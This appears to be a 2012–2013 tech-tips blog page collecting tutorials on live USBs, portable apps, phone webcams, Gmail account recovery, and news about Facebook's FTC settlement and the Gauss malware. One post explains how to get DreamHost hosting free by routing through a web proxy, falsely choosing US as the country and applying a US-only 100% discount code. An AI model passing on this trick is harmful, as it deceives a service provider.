Make The Website Professional

Today, I am going to show you how easy it is to create a professional-looking Flash website for free.

Know To Spread The Web

So you've made a new site, huh? But no one knows about it! Here you will find tips to spread news about a website that you've created!.

The Path To Be An Expert Geek

In this website one can find many TIPS AND TRICKS of Computer,Internet,Web,Mobile And Blogger Tips.

To Increase The Knowledge Of Bloggers

In This Site We Want To Increase The Knowledge Of Bloggers About Blogging To Be A Better Blogger.

How To make Money Online With Your own Website

If you look at many websites, you will probably notice that there are banner advertisements displayed on most pages. If you are a newcomer to the scene, you might think that you must either be a company or that your site must be famous before you can get advertisers, just as it is the case in hardcopy publications..

Get our toolbar!
Showing posts with label Computer Tips. Show all posts
Showing posts with label Computer Tips. Show all posts

Saturday, January 26, 2013

Make your own portable Mandriva Flash


The following tutorial covers the process of creating or making your own Mandriva Flash drive. If you already have a USB flash drive, why not put it to use? The MCNLive team has done some outstanding work with their latest Mandriva based MCNLive CD releases. The persistent loop features and USB installer are nearly flawless. The persist boot option allows a user to save "ALL" system changes and settings back to the loop image file. This remastering process is fairly simple, so let's get started.

Make your own portable Mandriva Flash

Q:How to Make your own Mandriva Flash:

A: Remastering MCNLive and creating a custom ISO

Download the MCNLive Toronto ISO and burn to a CD
Start your computer from the Live CD. Select the menu option to (Boot – Mounting NTFS read-write)
Customize your desktop, add/remove programs etc to make the system how you want it
From the M button in the Panel, navigate to MCNLive-> Remaster Live
Follow the simple onscreen instructions to create your new ISO
Navigate to where you saved the remaster.iso and click it, use k3b to burn the ISO to a CD
Now restart your computer from the remastered CD

B: Making the Flash Drive

Once you have started your PC from the remastered CD, insert your USB flash drive
From the M button in the Panel, navigate to MCNLive-> Create Live USB
Follow the onscreen instructions to perform the install to USB
Again, from the M button in the Panel, navigate to MCNLive-> Create persistent loop
Follow the onscreen instructions to build the loop image file for persistence usage. Let it create this file on your USB flash drive.
Reboot your PC, setting your System BIOS or boot menu to boot from the USB device
Proceed to Boot from the USB flash drive and enjoy.
Potentially Related Portable Linux Posts
Install MCNLive Toronto to a Flash Drive in Windows
Install MCNLive to a USB Thumb Drive using the CD
Put Mandriva 2010 on a USB Flash Drive (Windows)

PRASHANT KUMAR

Tuesday, December 4, 2012

Know To Create An iPhone Or Android App Without Any Coding Skills

Learning how to code and produce a basic iPhone or Android app is not a simple drag and drop process. While Apple’s Xcode helps lay down the foundation for building an iPhone app, it can take hours of coding and trial and error to produce a basic RSS feed or portfolio application.
But if you’re really eager to make a mobile app based on your website, business, organization, or just a fun quiz game, a website called Buzztouch may well be the web-based solution for you. Buzztouch is essentially Content Management Software for iOS and Android. It provides a template-based process in which you import your app’s information into the online software, and in turn it will create the code that you need to compile the data for your application. I gave a try and it does work.
Know To Create An iPhone Or Android App Without Any Coding Skills



What You Need

MUO has previously covered the steps on how to develop a simple iPhone app and submit it iTunes. You should read that article as it’s part of this process. Buzztouch however does not get your app onto iTunes, nor does it compile it in the programming application, Xcode, or the Android counterpart. What Buzztouch does is help you develop your app so that you can export the code to Xcode, and then from there you go through the process of submitting your app to the iTunes App Store. Since I’m an iPhone and Mac user, this review will focus on creating an iPhone app.
The tools Buzztouch provides are totally free. It seeks to inspire aspiring developers, designers, content publishers, and the like to leverage their technology.
However, beyond Buzztouch, you will need a copy of Xcode on your Mac. If you already have a current or older free version of Xcode, you’re set to go. If not, you will have to download it from the Mac App Store, for $5. Once you get your app completed, you will need to shell out $99 for a developer’s license to upload your app to the iTunes App Store where it will go through the approval process.


Know To Create An iPhone Or Android App Without Any Coding Skills

Developing Your App

Buzztouch provides some excellent video tutorials for developing your iPhone application. I will provide simply an overview of the process. Basically, the core content of the Buzztouch app consists of one or more basic mobile iPhone template items. For example, I partially created an iPhone RSS feed app for p2ktech.com, although of course you can download the official MUO app from the App Store.
After you do the free registration on the Buzztouch site, you will need to be familiar with the tools and templates that the app creation software provides. You will need to create and gather the content for your app before you get started in the process. It’s like gathering content for producing a website. In fact, your existing website could be the basis of a web-based iPhone app. Thus a Buzztouch app could be useful for realtors, modelling agencies, small restaurants, performers, bloggers, etc.
You start off the process by creating a name for your site.
Know To Create An iPhone Or Android App Without Any Coding Skills

Next, you need to add a logo for your app. I borrowed one from MUO’s existing application. A professional looking logo is highly recommended for your app to have any chance of being purchased and downloaded from the App Store. As you can see, Buzztouch makes adding the icon very easy. In each step of the process, an iPhone simulation will show you the results of the content you provide.
Know To Create An iPhone Or Android App Without Any Coding Skills

As shown in the following control panel, you will need to add a homepage image and introductory information for your app. That’s very easy to do. Where it says “Manage this app’s menus & screens” is the core content of your app.
Know To Create An iPhone Or Android App Without Any Coding Skills

Clicking on that tool, you are provided with a set of tools for building your app. So far example, if you want to an RSS feed app for your blog site, you would add the RSS feed tool as one of your Home Screen Menu items.
Know To Create An iPhone Or Android App Without Any Coding Skills

There are 20 other templates for adding items, such as a Streaming and/or YouTube video, an Email Us page, a multiple choice quiz, a single image, a PDF doc, and a share via Facebook tool.
Know To Create An iPhone Or Android App Without Any Coding Skills

As with any professional looking website, you will want to have the content of your app polished and well edited.

Compiling Code

At any time during the process of building your app, you can have Buzztouch compile the code and send it over to Xcode to see the results. After Buzztouch prepares your code, it will download it to your computer. In the resulting folder, you will want to click on the file with the name of your app and the extension, “xcodeproj.” When you click the Run button in Xcode, it will open the iPhone simulator that is a part of the programmer.
Know To Create An iPhone Or Android App Without Any Coding Skills

You really don’t need programming skills to produce your application, but you do need to be comfortable with using this sort of technology.
A few examples of apps developed by Buzztouch include Ian James’ Piano Live which is designed to keep his fans updated about  his live shows and other information;
Know To Create An iPhone Or Android App Without Any Coding Skills

and Thrifty Car Sales, a calculator produced by Thrifty Car Sales to calculate the interest rate on a car loan, as well as other tips for buying a car.
Know To Create An iPhone Or Android App Without Any Coding Skills

Let us know what you think of Buzztouch. If you create an app and post it for free download on the App Store, let us know about it. We might consider reviewing it as a follow-up to this article.

Tuesday, October 23, 2012

Know To Create Your Own Portable App For A Flash Drive


Know To Create Your Own Portable App For A Flash Drive
Over the past few years, USB thumb drives have become very popular. They transfer files relatively fast (compared to CD’s), happen to be extremely small and unobtrusive, and plug into almost any computer with a USB port.

Personally, I have two flash drives on my keychain right now, and I can’t imagine how I ever got by without them. Thanks to the convenience of the modern thumb drive, I can copy documents or other important files onto a small drive that fits in a change pocket, and transfer them to another computer. This is in fact, what most people do with thumb drives–nothing special so far.
Using your flash drive as a backup and transfer device is great–but you haven’t really unlocked the potential of the USB until you’ve installed some programs on it.

Sites like PortableApps actually have pre-packaged applications that you can install directly to your USB drive. These apps, games, and utilities will run from your USB stick when you plug it into a computer(provided that they’re on the operating system the programs run on). Aibek compiled an excellent list of 100 Portable Apps for your USB Stick that I would recommend checking out if you’re looking for pre-packaged programs to put on your thumb drive.
So, you found a really cool application and there was no pre-packaged version of it anywhere on the internet that would install it to your USB drive. Looks like it’s time to learn how to create a portable app for flash drive. Please note: I’m not referring to U3 flash drives; that’s a different ballgame in several ways (even though they can be used much the same way).

The example application I’m going to make portable is Audacity, an open source audio editing program. You can download your own file, or follow along using Audacity (recommended for your first time) before you try this method on your own applications.

Step 1: Download the application setup file

If you’re following along, download the Audacity installation file. Make sure this download is relatively isolated or things will get confusing later.

Step 2: Download Universal Extractor and WinRAR

Download Universal Extractor and a program such as WinRAR. Install both programs–we need both to make this work. Make sure you allow both programs to associate with their respective file-types, and restart the computer if prompted–better safe than sorry. I didn’t need to restart, but it couldn’t hurt.

Step 3: UniExtract the Setup file

Know To Create Your Own Portable App For A Flash Drive

Right click your downloaded setup file (in my case, it’s Audacity) and click “UniExtract here”. Go ahead and specify a folder that you would like to extract the setup file to. A folder will be created with the extracted files inside. Open up that folder for the next step.

Step 4: Find the EXE file that runs the program

In that extracted folder, look for the .exe file that runs the program. It’s pretty easy to spot and usually has the same name as the program you’re trying to install. For instance, in my case, the .exe is named “audacity.exe”. Double click the file and verify that it runs the program successfully.

Step 5: Pack all the files into an archive


Highlight every file in that folder, right click on them, and click “Add to archive” in the contextual menu.

Know To Create Your Own Portable App For A Flash Drive

In the resulting dialogue box, name your archive “Audacity Portable” or whatever you prefer. Under compression method, select “Best”, and be sure to check “Create SFX archive”.

Know To Create Your Own Portable App For A Flash Drive

Next, click the ‘Advanced’ tab and click “SFX Options…”. In “Run after extraction” field, input the name of the .exe file that you located in Step 4. In my case, the name was “audacity.exe”.

Know To Create Your Own Portable App For A Flash Drive

Head on over to the ‘Modes’ tab and select “Unpack to temporary folder” and “Hide all”

Know To Create Your Own Portable App For A Flash Drive

Lastly, go to the ‘Update’ tab and select “Overwrite all files”. Now go ahead and hit OK, and watch WinRAR generate an application file.

Step 6: Copy the file to your USB drive

This step is pretty self explanatory. Drag the application to your USB drive (wherever you want it to be) and then give it a test run! Double click the application to run it–on any Windows machine! This version of Audacity is Windows only.
So to sum things up, we essentially found a file we wanted, extracted it, and then repackaged it with a few of our own preferences thrown in. Every time you click the application, it’s actually going to briefly unpack the file into a few hidden folders so that the .exe has access to the resources it needs. This means that the app takes about 2 seconds or so longer to execute (depending on the size of the app), but it will execute seamlessly.
What do you think? Did this process work for you? I personally like this method, but there are others out there that can also work (like copying the entire program folder from the program files directory). Unfortunately, the other methods I’ve tried have been unreliable.
The general rule of thumb for the method I’ve shown here is that if the .exe in step 4 executes successfully, the process will also be successful and you’ll be able to pack it all into an application file. I hope you enjoyed this article and found its contents useful. Let me know what you think in the comments section!

PRASHANT KUMAR

Monday, September 24, 2012

How to get a free domain name + 1 year free hosting from DreamHost


If you are thinking it’s a joke, it’s NOT. Here is a fully working trick to get a FREE 1-year domain name + Free Unlimited Hosting from DreamHost. Dreamhost is one of world’s most popular and reliable services.

We had tried this method and it worked flawlessly.

Follow the steps below carefully to get 1-year domain and Unlimited Dreamhost hosting Free:


How to get a free domain name + 1 year free hosting from DreamHost
Step 1. Sign up for Free Dreamhostapps account. Choose dreamhosters sub-domain in step1. In step 5 fill up your details and sign up.

Step 2. Visit http://kproxy.com

Step 3. Enter this URL, http://www.dreamhost.com/ into the text box and click on surf.

Step 4. Click on Sign up Now and choose to Host a domain.

Step 5. Fill all the information properly (use one year plan etc.)

Step 6. Very Important - While entering the address choose country as US and not IN. Also enter the same email address which you used for DreamHostApps.

Step 7. Use the Code BARCAMPLA7 for 100% discount.

Step 8. Enjoy!



Code BARCAMPLA7 (got this using Twitter search for “Dreamhost code”), provides 100% discount, but only for US locations ( so choose country as US ).

Do share your experience here. As always, p2ktech will keep sharing the fantastic tips and freebies  .

PRASHANT KUMAR

Tuesday, September 18, 2012

How To Use Mobile Phone As Webcam


This tutorial will show you How to use your mobile as a Webcam.

Many of us don’t have Webcams and might want to use your mobile as a Webcam to save on some cash and also to put your mobile camera to better use.
You will need to install your Bluetooth stack / drivers – Microsoft, Bluesoliel, Widcomm etc if you plan to use Bluetooth to connect your phone and PC. You will also need to install Nokia PC Suite in case you are using a Nokia phone.
There are two applications to use your mobile as a Webcam:

1. Mobiola Webcam

How To Use Mobile Phone As WebcamDownload Mobiola Webcam

Mobiola Webcam is the most popular Webcam software for mobiles, it is compatible with many phones – Symbian S60, S60 V3, UIQ, Windows Mobile, Blackberry etc. In case it isn’t compatible with your phone, but your phone supports J2ME, you can use the Mobiola Webcam Lite version. It runs on almost all J2ME phones. In case, you have some prehistoric phone with no J2ME support, then it’s time to dump it and get a new phone.
Just download Mobiola Webcam / Webcam Lite from the above links after selecting your platform. Install the Mobiola Web cam setup on your PC and transfer the mobile sis / jar file to your mobile and install it. Be sure to give it all the access permissions it requires during installation.
Just start the Mobiola application on your mobile and PC. From your mobile, select Options > Connect and select the connection method – Bluetooth, USB or Wi-Fi. We would recommend connecting via data cable as it is faster. After you are connected, you can use the mobile camera as your Webcam. Just start your favourite application and in the Video / Webcam options, select the Mobiola Webcam / Your Phone. You can adjust the video quality, contrast and brightness from Options > Settings.

2. WWIGO (Webcam Wherever I Go)

How To Use Mobile Phone As WebcamDownload WWIGO
WWIGO is also a nice little application that allows you to use your mobile camera as a Webcam. It supports connections via Bluetooth only though. Just download the application from the above link and install it. After installation, navigate to your Program Files directory and get the WWIGO mobile application from there. Transfer it to your mobile and install it.
Now start both the PC and mobile WWIGO applications. Now select an GPRS access point in your mobile, and select Options > Connect. Select your PC as the Bluetooth device and let the PC and mobile WWIGO applications connect.
After the connection is done, you can use your mobile camera to record videos as a Webcam. To use it as a Webcam, open the Webcam / video settings of your application and select WWIGO as the Webcam. You can adjust the video resolution and zoom levels from Options > Settings
That’s it, You are done. Happy Chatting.
Note: Yea, I know there are loads of similar tutorials everywhere. But as I was running out of ideas to write on, I thought this would be fine.

PRASHANT KUMAR

Sunday, September 9, 2012

How To Turn A USB Flash Drive Into Extra Virtual RAM



It's not hard to turn an extra USB stick lying around that's collecting dust into extra memory for your computer, allowing it to run speedier and manage more applications better.

DIY site Instructables has a guide on how to put a flash drive to good use by using it to increase the virtual RAM on your Windows computer. For the best results, Instructables user MoritzB suggests using a USB drive smaller than 4 GB for this little trick. We've paraphrased some of the instructions for you below:
How To Turn A USB Flash Drive Into Extra Virtual RAM

Rename your thumb drive as "RAM DRIVE" or something similar, so you can see which drive is being used as RAM.
Delete all the stuff on the flash drive. Check for hidden files.
Right click on My Computer, and go to Properties. Once there, click on Advanced and go to the system output's Settings.
Click on Advanced, and then Edit.
Click on your thumb drive above, and select "user-defined size." Here you can see the size of your flash drive.
Calculate the size of the flash drive, and subtract 5 Mb.
Type this number in the first box. In the second box, type in the same number.
Click Set and confirm all your settings, applying them wherever you can.
Restart your computer.
Windows 7 users should go into their System Properties, under the Performance tab for these options. After you're done, your computer will recognize your flash drive as extra virtual memory. Do not pull out your thumb drive after these settings are implemented. It could crash your computer. Instructables has the whole tutorial, with step-by-step screenshots below.

Use your USB flash drive as virtual RAM [Instructables]

PRASHANT KUMAR

Sunday, August 12, 2012

Know To Disable Error Reporting In XP


The error reporting feature in Windows XP is turned on by default but you may want to disable error reporting for privacy concerns, if you're not connected to the Internet all the time, or to simply stop being alerted by it.
Know To Disable Error Reporting In XP

Error reporting works by prompting you after a critical error in the operating system or in other programs and asking permission to notify Microsoft about it. This way, Microsoft can gather technical information about serious errors from millions of users, helping them develop fixes and service packs.

If you'd like to disable error reporting, follow the easy steps outlined below.

Difficulty: Easy

Time Required: Disabling error reporting in Windows XP usually takes less than 5 minutes

Here's How:

1.Click on Start and then Control Panel.

2.Click on the Performance and Maintenance link.

Note: If you're viewing the Classic View of Control Panel, double-click on the System icon and skip        to Step 4.

3.Under the or pick a Control Panel icon section, click on the System link.

4.In the System Properties window, click on the Advanced tab.

5.Near the bottom of the window, click on the Error Reporting button.

6.In the Error Reporting window that appears, choose the Disable error reporting radio button and click the OK button.

Note: I would recommend leaving the But notify me when critical errors occur checkbox checked. You probably still want Windows XP to notify you about the error, just not Microsoft.

7.Click the OK button on the System Properties window

8.You can now close the Control Panel or Performance and Maintenance window.

Tips: Not a Windows XP user? See How Do I Disable Error Reporting in Windows? for specific instructions for your version of Windows.

PRASHANT KUMAR

Saturday, August 11, 2012

News:Facebook to undergo privacy checks for 20 years


WASHINGTON: Social networking giant Facebook will be subjected to two decades of regular privacy checkups and other penalties, as part of a settlement finalised by the Federal Trade Commission (FTC).

News:Facebook to undergo privacy checks for 20 yearsThe FTC agreement implicated that Facebook must now obtain 'consent' before sharing a user's information with advertisers or others, which differs from its current privacy settings, and also bars the social site from misrepresenting its privacy and security practices again.

The settlement has the same outlines as the agreement, which FTC reached with Google in 2011 over that company's botched rollout of the Buzz social network, Politico reports.

The FTC faulted Facebook in 2011 for the way the company had handled users' private information, and allowed access of third-party apps.

Among other slip-ups, in December of 2009, Facebook changed its site in ways, which resulted in the private information of users being available to the public, the report said.

The FTC also charged Facebook with misrepresenting the sort of information that it shared with advertisers, and said that the social site wasn't clear with users about the fate of their photos and videos, upon deletion of their accounts, as some of the content didn't disappear, contrary to what the site states, it added.

PRASHANT KUMAR

Thursday, August 9, 2012

Kaspersky :Virus found in Middle East that can spy on finance transactions.

BOSTON: A new cyber surveillance virus has been found in the Middle East that can spy on financial transactions, email and social networking activity, according to a leading computer security firm, Kaspersky Lab.


A new cyber surveillance virus has been found in the Middle East that can spy on financial transactions, email and social networking activity, according to a leading computer security firm, Kaspersky Lab.
      A new cyber  surveillance virus has been found in 
      the Middle East that can spy on financial
      transactions, email and  social networking 
      activity, according to a leading computer 
      security firm, Kaspersky Lab.
Dubbed Gauss, the virus may also be capable of attacking critical infrastructure and was built in the same laboratories as Stuxnet, the computer worm widely believed to have been used by the United States and Israel to attack Iran's nuclear program, Kaspersky Lab said on Thursday.

The Moscow-based firm said it found Gauss had infected personal computers in Lebanon, Israel and the Palestinian Territories. It declined to speculate on who was behind the virus but said it was related to Stuxnet and two other cyber espionage tools, Flame and Duqu.

"After looking at Stuxnet, Duqu and Flame, we can say with a high degree of certainty that Gauss comes from the same 'factory' or 'factories,'" Kaspersky Lab said in a posting on its website. "All these attack toolkits represent the high end of nation-state-sponsored cyber-espionage and cyber war operations." 

Kaspersky Lab's findings are likely to fuel a growing international debate over the development and use of cyber weapons. Those discussions were stirred up by the discovery of Flame in May by Kaspersky and others. Washington has declined comment on whether it was behind Stuxnet.

According to Kaspersky Lab, Gauss can steal Internet browser passwords and other data, send information about system configurations, steal credentials for accessing banking systems in the Middle East, and hijack login information for social networking sites, email and instant messaging accounts.

Modules in the Gauss virus have internal names that Kaspersky Lab researchers believe were chosen to pay homage to famous mathematicians and philosophers, including Johann Carl Friedrich Gauss, Kurt Godel and Joseph-Louis Lagrange.

Kaspersky Lab said it called the virus Gauss because that is the name of the most important module, which implements its data-stealing capabilities.

One of the firm's top researchers said Gauss also contains a module known as "Godel" that may include a Stuxnet-like weapon for attacking industrial control systems.

Stuxnet, discovered in 2010, spread via USB drives and was designed to attack computers that controlled the centrifuges at a uranium enrichment facility in Natanz, Iran.

PRASHANT KUMAR

Friday, August 3, 2012

Know To Get Gmail Account Recovery and Security

Know To Get Gmail Account Recovery and Security


The propose of this article is to help guide you through the process of recovering a lost account and (if it was lost due to hacking) re-securing it so that is it less likely to be lost again.

There are other sources of information including the Gmail* help center http://mail.google.com/support/?hl=en and the GMail help forums http://www.google.com/support/forum/p/gmail?hl=en both of which support searching for topics of interest.

Please note that you can not recover your account by posting to the Gmail help forum. You must follow the procedures outlined below.


How to Recover Your Account

Here i am going to explain you all about how to get back the Hacked Gmail Account.
So here is the trick explained for this purpose.

This article is only for the education purpose and not for any misuse of this artcle.

There are other sources of information including the Gmail help center http://mail.google.com/support/?hl=en and the GMail help forums http://www.google.com/support/forum/p/gmail?hl=en both of which support searching for topics of interest.

Please note that you can not recover your account by posting to the Gmail help forum. You must follow the procedures outlined below

We will assume you went to https://mail.google.com/ and tried to log into your account. It didn’t work and you found your way here. You need to start with the following decision tree to determine what actions you need to take to recover your account.

If your password does not work, use the “Can’t access your account?” link which will direct you to a page with three recovery options:
Answer your security question and perform an on-line password reset.
Request a password reset e-mail to be sent to your recovery account.
Proceed to one of two versions of the Account Recovery Form (for accounts with or without 2-step verification enabled). Look for a "Verify your identity" link if the other options don't work.
https://www.google.com/accounts/recovery?hl=en

If you are told the account does not exist, it may have been deleted by the hacker, so use the Account Recovery Form to try and recover it:
https://www.google.com/support/accounts/bin/request.py?ara=1

If you are instructed to supply a mobile number to receive a SMS code, you need to follow the process as described:
http://www.google.com/support/forum/p/gmail/thread?tid=69a33682180a6d01&hl=en
http://mail.google.com/support/bin/answer.py?answer=114129

“Lockout (Sector 4)”, is because of abnormal account usage that may indicate compromise. It should automatically unlock in 24 hours or less.
http://mail.google.com/support/bin/answer.py?answer=43692

“Temporary Error (502)” or 500, indicates an internal error that should correct itself soon.
http://mail.google.com/support/bin/answer.py?answer=140031

Any message about account “maintenance”, indicates that temporary server maintenance is in process which should take less that 24 hours.
http://mail.google.com/support/bin/answer.py?hl=en&answer=63592

Any message about your account being “Disabled” or “Suspended, typically indicates some abuse, violation of the Terms of Service, or possibly a compromised account. Follow any instruction given or provided links when you try to sign in.
http://mail.google.com/support/bin/answer.py?hl=en&answer=43692

If you see some other error not listed above, use the following more comprehensive list of possible errors.
http://mail.google.com/support/bin/static.py?hl=en&page=error_msg.cs

If you are still unsure what to do, there is a help article that you can also use to walk through the process of account recovery. It handles some specific cases not covered above. You might find it more useful if you are not sure just what you should do for your specific case.
http://mail.google.com/support/bin/answer.py?hl=en&answer=46346

Additional Recovery Information
Doing a password reset is the easiest way to regain access to an account. But it can fail if you forgot your secret question, if the recover e-mail address is no longer valid, or it the account was compromised and that information changed.

The Account Recovery Form is the alternative method. It is important that you complete as much of the form as possible, and that the information be as accurate as you can make it. If the form is rejected you can try submitting it again. You can re-submit it as many times as you want, but always wait for a reply to each submission before submitting again. If you don’t receive a reply, check your spam/junk folder (especially if it’s a non-Gmail account).

It’s very important that as you repeatedly submit the Account Recovery Form that you fill in more of the blanks with more accurate information. There is some threshold of correct information you need to prove ownership, so a rejection means you need to supply more. Submitting the same form with no additional information multiple times does not help.

While this system works for many people, there are some cases where it can be very frustrating. But don’t give up. There’s nothing you can do (like deleting the account) until you re-gain access to it and since Google does not offer live one on one support for the free Gmail product directly these are your options.

Also realize that the more complicated account recover process (that very few people need to use) is one of the trade-offs for not being forced to provide a lot of personal information when you create the account (that everyone has to do). Many people prefer this for privacy reasons.

Hints for successful account recovery

It’s not about the number of times you submit the Account Recovery Form, it’s about providing more and better answers with each attempt. If your submission is rejected, you must work harder to provide more answers, and make the answers more accurate in subsequent submissions.
Wait for a response before each new submission (be sure to check Spam). Responses could be delayed as much as 24 hours but you should wait a full 48 hours before submitting another form.
If you are not receiving a response, check your Spam or Junk folder on the account you specified for replies. Also double (triple) check that you correctly spelled the e-mail account name.
Duplicate submissions, or submissions without waiting for a reply can trigger a submission lock forcing you to wait a few days to try again.
Make your best guess on every field of the form. You never know what will help.
There may be one other option for simple password recovery if your account wasn’t compromised and you simply forgot your password. If you have your browser setup to remember your account information you may be able to view your saved password. In Firefox, you can use: Tools->Options, Security, Saved Password, Show Passwords. If you use another browser, then (install and) open Firefox, use File->Import to import your settings and then check to see if the saved password is accessible. Again, this only works for people who forgot their password due to relying on the browser’s auto-fill function, but if it applies it might be an easier than the above procedures.


FAQ About Account Recovery

Q. Why can’t I tell someone private information about my account that they could look up to verify my claim?
A. Account privacy rules are very strict within Google, and allowing employees to look at the contents of an account would be a serious breach of privacy.

Q. Why isn’t there a comments section on the Account Recovery Form where I could add additional information to prove my claim?
A. Like above, it would be a violation of account privacy for an employee to look in the account to verify any additional information supplied.

Q. Why can’t I simply talk to somebody about this?
A. Unfortunately, Google does not offer live support for the free Gmail product (see: http://mail.google.com/support/bin/request.py?contact_type=contact_policy). You must use the recovery methods provided.

Q. Why can’t Google lock the account to protect it from any more damage or outgoing spam.
A. They will lock an account that the detection system identifies as being compromised and sending out spam. But again, privacy concerns would prevent them from simply locking an account because someone claims it’s theirs and is compromised. In addition, since there is no live support, there is no one to even make such a request to.

Q. I had a really long password of random strings that would be impossible to guess. How was my account compromised?
A. Google (as most e-mail providers) have blocks to prevent trying lots of passwords to guess the correct one (brute-force attacks). Most accounts are compromised by harvesting passwords other ways. While a secure password is important, it’s only one in a long list of things needed to keep any online account secure.

Q. But I’m very careful with my password. I don’t give it to anyone except an official request from Gmail.
A. Unfortunately if you provided your password in response to any e-mail (even claiming to be from Google/Gmail) then your password was harvested by phishing. It’s very common, and can trick even the most careful people.

Q. My contacts were deleted by the hacker, how do I recover them?
A. Deleted contacts can now be restored to any point in the last thirty-days: http://mail.google.com/support/bin/answer.py?hl=en&answer=1069522

Q. My e-mail history was deleted by the hacker, how do I recover it?
A. Have you looked in All Mail and Trash for the missing information? Have you used Search to try and find it? Unfortunately, messages deleted from Trash or Spam can not be recovered. If you would like to request Google attempt to recovery messages deleted by a hacker, see: http://mail.google.com/support/bin/answer.py?hl=en&answer=8256

Q. My account was deleted by the hacker, can I recover it?
A. The Account Recovery Form can sometimes restore a recently deleted account. That is your only option in this case.

Q. I don’t care about the account, can I just get the e-mail history or the contacts from it.
A. Unfortunately, you have to be able to access the account in order to transfer any information out of it. This means you need to try and recover the account.

Q. I don’t care about the contents, I just need the e-mail address back because I have other things linked to that address.
A. Account names are never re-used, so you can’t re-create the account. So to get the name back you will have to try and recover the account.

Q. Can I find out who did this? Can anyone prosecute them?
A. About the only information you have available is the list of the last 10 IPs to access your account (see the Details link below the Inbox). But given how easy it is to fake IPs, and how inaccurate they are, it’s unlikely that more than a general location can be determined. In general, law enforcement is not interested in a simple compromised account, and Google is not a law enforcement agency. Bottom line is: one’s energy is better spent on recovery and re-securing the account.

Q. Isn’t what the person did illegal? Can I sue them or get them arrested?
A. Any legal questions should be asked of local law enforcement or an attorney. Google is neither of those and can not advise you on any actions.

Q. Can I find out what they did in my account while they had access.
A. There are no account activity logs available, so you can’t find out for sure. If there is spam in your Sent Mail, they you know they used the account for that. But there’s no way to know if or what messages they may have looked at, so take appropriate precautions.

Q. How was my account compromised?
A. There are many ways passwords can be harvested and account compromised, but the most common ones include:
Using the same password on multiple web-sites. A less secure site is hacked and they get the user database (e-mail and password) and then just try them all. If the person did not use a unique password, the hacker gains access to the e-mail account.
Phishing e-mails that ask for account information or direct you to a phishing web-site. Don’t dismiss this because the messages are a lot more convincing that you would imagine, often using text copied from actual Google e-mails or on-line forms.
Use of a computer that is infected with a key-logger or other malware (most common for public computers like at a school or library) which records your login information.

When you reclaim Your Account

Begin by scrolling to the bottom of your Gmail page and see if there are any other sessions signed into your account (“This account is open in 1 other location”). Then click the word “Details” where it says “Last account activity” and then “Sign out all other sessions”. Now change your password to anything reasonable but without worrying too much about how secure because you are going to change it again. Next check all the following items and verify that they are set correctly.

Note: in the following “Settings” means “Mail settings” as found under the Gear icon in the upper/right of the Gmail window. If you still have the old layout, then “Settings” will be one of the choices along the top. If you have the older “Settings” link, some of the paths below will be slightly different.

Potential Spam:
Settings -> General -> Signature [make sure nothing as been added]
Settings -> General -> Vacation Responder [make sure it's disabled and empty]
E-mail Theft
Settings -> Forwarding and POP/IMAP -> POP Download [disabled]
Settings -> Forwarding and POP/IMAP -> IMAP Access [disabled]
Settings -> Forwarding and POP/IMAP -> Forwarding [disabled or correct address]
Settings -> Filters [no filters that forward or delete e-mail]
Settings -> Accounts and Import -> Send Mail As [make sure it is using your correct e-mail address, delete any unrecognized entries]
Account Security:
Settings -> Accounts and Import -> Change Account Settings -> Change Password [pick a new secure password]
Settings -> Accounts and Import -> Change Account Settings -> Change password recovery options [verify secret question, SMS and recovery e-mail address]
Settings -> Accounts and Import -> Change Account Settings -> Other Google account settings -> Email Address -> Edit [verify your name and other settings]
Settings -> Accounts and Import -> Change Account Settings -> Other Google account settings -> Authorizing applications & sites [revoke Access to any sites listed]
Settings -> Accounts and Import -> Change Account Settings -> Other Google account settings -> Using 2-step verification [enable 2-step verification]
Now that your account is secure, check again for other sessions logged in. If there is still another session on the account, repeat the above until you successfully get everything secured while no one else is logged in.
Additional Information
Gmail Security Checklist: http://mail.google.com/support/bin/static.py?hl=en&page=checklist.cs&tab=29488
Keeping account secure: https://mail.google.com/support/bin/answer.py?hl=en&answer=46526
Protecting your account: https://mail.google.com/support/bin/answer.py?hl=en&answer=29407
More account security info: http://www.google.com/help/security/
If your account is compromised: http://mail.google.com/support/bin/answer.py?hl=en&answer=50270
If you are missing messages after recovering your account: http://mail.google.com/support/bin/answer.py?hl=en&answer=8256
Someone using your address: http://mail.google.com/support/bin/answer.py?hl=en&answer=50200
Google Employee comments: http://www.google.com/support/forum/p/gmail/thread?tid=560d53dee40be5e6&hl=en&start=70

In this way you can recover your gmail account.


PRASHANT KUMAR

Wednesday, August 1, 2012

Things An Android DO Better Than Iphone


We all know the iPhone, know how it works (or doesn’t work, in many instances). We know there is an app for just about every possible task on the planet. But an Android phone? You don’t really know an Android phone until you’ve worked with one. That’s when you’ll find how far you can push your mobile experience.



1: Browsing


Let me first say I do like the Safari browser on the iPhone. It’s fast, it’s reliable, it’s stable. But flexible? Flash? Monopolistic? Yes Safari is the only browser for the iPhone, and that browser still does not do Flash. However, the Android browser is one of the best browsers on the mobile market. On my HTC Hero, I have Opera Mini, Dolphin, and the default Browser. I haven’t used Opera Mini since I used it a couple of times upon installation. Dolphin is outstanding, with its use of Tabs and Gestures. But the default Android browser just can’t be beat. It usually loads pages faster than Safari, has Flash support, and simply does everything a browser should do.

2: Desktop


Instead of just having icons littering your phone’s desktop (like the iPhone), the Android phone adds widgets to the desktop. These widgets tend to have an actual purpose. For example:

The Twitter Widget allows you to update your Twitter status from your mobile desktop.
The People Widget allows you to enable different actions for different contacts right from your desktop (say you want to call your wife with a single click and text your child from a single click).
The Messages Widget allows you to instantly see your email from the desktop.
The Android desktop is on a completely different level from the iPhone desktop. To compare them is actually unfair. Apples to Éclairs as it were.

3: Connectivity


On one of the “pages” of my Hero desktop, I have four buttons:

Turn on/off bluetooth
Turn on/off Wifi
Turn on/off Mobile Network
Turn on/off GPS
These buttons let you instantly switch on or off the various connectivity options, which will go a long way toward conserving battery life. There is also an app in the Market called Y5, which will turn off Wi-Fi automatically when no known wireless network is available. To do any of this on the iPhone, you have to go into the Settings screen and navigate your way around the various options.

4: PC connection


Unlike the iPhone, you don’t need to have iTunes to manage your phone. Now, I say this with a bit of a chewed-up tongue because Android can’t sync with the Linux desktop yet. That’s okay for now. But Android can mount the SD card so that it is usable (via drag and drop) by any operating system. On this you can add music and files, which will then be usable on the phone. Simple.

5: Multi-notification


